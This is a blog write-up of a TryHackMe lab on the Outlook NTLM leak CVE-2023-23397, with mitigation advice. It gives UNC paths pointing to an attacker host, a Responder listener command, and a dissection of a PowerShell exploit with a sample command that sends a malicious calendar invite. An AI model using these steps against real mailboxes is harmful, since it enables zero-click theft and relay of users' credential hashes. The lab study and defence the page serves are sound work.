We covered the recent Microsoft Outlook NTLM Vulnerability CVE-2023-23397 that could lead to NTLM hash leak if successful. Also we covered a demo scenario in addition to mitigation and detection. This was part of TryHackMe Outlook NTLM Leak.

CVE-2023-23397 Overview

The vulnerability affects only the Outlook desktop app, not the web or mobile versions. It allows attackers to harvest NTLMv2 hashes from victims’ machines without any interaction beyond opening the email. This is achieved by sending a malicious calendar invite with a manipulated reminder that points to an attacker-controlled SMB path.

When the reminder is triggered (set to 0 minutes), it forces Outlook to call the remote file, leaking the NTLM hash in the process. The attack utilizes tools like Responder to capture hashes and OutlookSpy to alter appointment properties in Visual Basic. The video concludes by urging users to update Outlook and use Microsoft’s detection/cleanup PowerShell script if they suspect compromise.

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.

To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker’s machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called PidLidReminderFileParameter. To ensure that the audio we embed in our malicious email will take precedence over the victim’s default reminder configurations, we will also need to set another parameter called PidLidReminderOverride to true.

Setting up The Environment

Target must be using Outlook Desktop App (any version prior to patch).

The machine must be domain-joined or able to resolve SMB connections.

OutlookSpy add-in is needed to craft the malicious payload (for demonstration/testing).

To set up the PidLidReminderFileParameter property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:

\\ATTACKER_IP\foo\bar.wav

When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker’s machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.

If for some reason the SMB protocol isn’t a viable alternative to use, non-server versions of Windows will accept using UNC paths pointing to ports 80 or 443, and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such UNC path is as follows:

\\ATTACKER_IP@80\foo\bar.wav

\\ATTACKER_IP@443\foo\bar.wav

This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).

Setting up Responder

On the attacker machine:

  • Responder tool listening on port 445 (SMB) to catch NTLM hash leaks.
  • A shared SMB/HTTP server hosting a malicious “sound” file (reverse shell or executable).

Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it will simply emulate an SMB server and capture any authentication attempt against it.

To launch Responder to listen for authentication attempts in your ens5 interface, you can simply run the following command in your AttackBox:

AttackBox
root@attackbox$ responder -I ens5

We are now ready to trigger an authentication attempt via the Outlook vulnerability.

Attempting to Handcraft a Malicious Appointment

Using OutlookSpy, the attacker:

  • Crafts a new appointment with the reminder set to 0 minutes.
  • Sets the reminderSoundFile parameter to point to the malicious SMB share (e.g. \\192.168.1.10\payload\reverse.exe).
  • Enables ReminderOverrideDefault and ReminderPlaySound to True using VBScript.

This makes Outlook try to fetch and play the sound file the moment the reminder is triggered.

As a first attempt, we could manually create an appointment and edit the path to the reminder’s sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button on the taskbar.

We will create an appointment that includes a reminder set in 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder’s sound file

We can try setting the sound file path to a UNC path that points to our AttackBox and click the OK button

However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue

Since Outlook isn’t expecting users to input a UNC path here, it probably discards our attempt as invalid output. But not all hope is lost!

OutlookSpy to the Rescue

Even if Outlook cannot set the reminder’s sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. This plugin will allow you to access all of Outlook’s internal parameters directly, including the reminder’s sound file.

You can find OutlookSpy’s installer in your machine’s desktop. You will need to install it manually before proceeding. Be sure to close Outlook before running the installer.

To view our current appointment from OutlookSpy, click the OutlookSpy tab and then the CurrentItem button in the taskbar:

Note: Be sure to click the CurrentItem button from within the appointment, or you might modify different Outlook components.

From this window, you can see the parameters associated with the appointment’s reminder. We want to set the ReminderSoundFile parameter to the UNC path that points to our AttackBox and set both the ReminderOverrideDefault and ReminderPlaySound to true. Just for reference, here’s what each parameter does:

  • ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
  • ReminderOverrideDefault: boolean value that indicates the receiving Outlook client to play the sound pointed by ReminderSoundFile, instead of the default one.
  • ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder in our AttackBox.

We can use the script tab and the following script to change the parameters to the required values

Be sure to click the Run button for the changes to be applied. You can go back to the Properties tab to check that the values were correctly changed. Finally, save your appointment to add it to your calendar, making sure the reminder is set to 0 minutes and that the appointment matches the current time and date, as we want it to trigger immediately

If all went as expected, you should immediately see a reminder popping up

And you should receive the authentication attempt in your Responder console on your AttackBox

Exploitation

Summarising the steps required to exploit the vulnerability, an attacker would need to:

  1. Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker’s machine.
  2. Send the invite to the victim via email.
  3. Wait for the reminder to trigger a connection against the attacker’s machine.
  4. Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.

Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment by hand is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment.

In this task, we will look at the exploit published by Oddvar Moe, which is probably the easiest to understand and use. This Powershell exploit leverages Outlook’s COM objects to build emails and appointments easily. It contains a couple of functions that we can use:

  • Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
  • Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook’s current default account.

Dissecting the Exploit’s Code

Both will create an appointment similarly, so we’ll explain the Save-CalendarNTLMLeak only.

First, we will instantiate an “Outlook.Application” object and create an appointment.

$Outlook = New-Object -comObject Outlook.Application
$newcal = $outlook.CreateItem('olAppointmentItem')

The usual parameters of an appointment will be set. These include the recipients, meeting subject, location, body and start and end dates. The exploit sets the start day to the current time so that the reminder is triggered immediately:

$newcal.Recipients.add($recipient)
$newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$newcal.Subject = $meetingsubject
$newcal.Location = "Virtual"
$newcal.Body = $meetingbody
$newcal.Start = get-date
$newcal.End = (get-date).AddHours(2)

The following additional parameters will be configured to point the reminder’s sound file to the attacker’s server, as previously explained:

$newcal.ReminderSoundFile = $remotefilepath
$newcal.ReminderOverrideDefault = 1
$newcal.ReminderSet = 1
$newcal.ReminderPlaysound = 1

Finally, the appointment will be sent to the recipient via email:

$newcal.send()

Using the Exploit

You can import the exploit’s functions with the Import-Module cmdlet. After that, both functions will be available in your current Powershell. To send an email with a malicious appointment, you can just run the following command:

Powershell
PS C:\> cd C:\Users\Administrator\Desktop\
PS C:\Users\Administrator\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\Administrator\Desktop\> Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a regular meeting invitation :)"

Be sure to replace ATTACKER_IP with the IP address of your AttackBox in the -remotefilepath parameter. Notice that you are using the exploit to send yourself an email in this case, as we have a single account in the machine, but normally you would target other email addresses.

Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the “Allow access for 10 minutes” checkbox should also help speed this process up

Deep Exploit Logic Explained

  • Trigger Mechanism: Outlook uses sound files in .wav format to alert users of upcoming appointments. The vulnerability abuses this by pointing the sound setting to a remote location, which Windows tries to authenticate with before accessing.
  • Hash Capture: The Windows SMB protocol automatically sends NTLM hashes when connecting to remote file shares, allowing Responder to catch these hashes passively.
  • No Interaction Needed: The exploit does not require the victim to click or approve anything. Simply receiving and having Outlook auto-trigger the reminder is sufficient.

Tools Involved

ToolPurpose
ResponderCaptures incoming NTLM hash requests on port 445.
OutlookSpyAllows editing of internal properties of Outlook appointments.
PowerShell ScriptScans and removes malicious appointments, cleans indicators.

Video Walkthrough

Mitigation Steps

Microsoft has released a PowerShell detection and cleanup script, which:

  • Scans for suspicious reminder settings (reminderSoundFile, ReminderOverrideDefault).
  • Identifies and removes any malicious appointments.
  • Cleans residual files from potential exploitation attempts.

Update Outlook Desktop immediately to patched versions.

Disable NTLM authentication if not required.

Block outbound SMB (port 445) at the firewall to prevent external leaks.

Monitor calendar appointment objects in Outlook for unexpected sound references.

Use endpoint protection to detect reverse shells or unauthorized SMB traffic.

, , , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles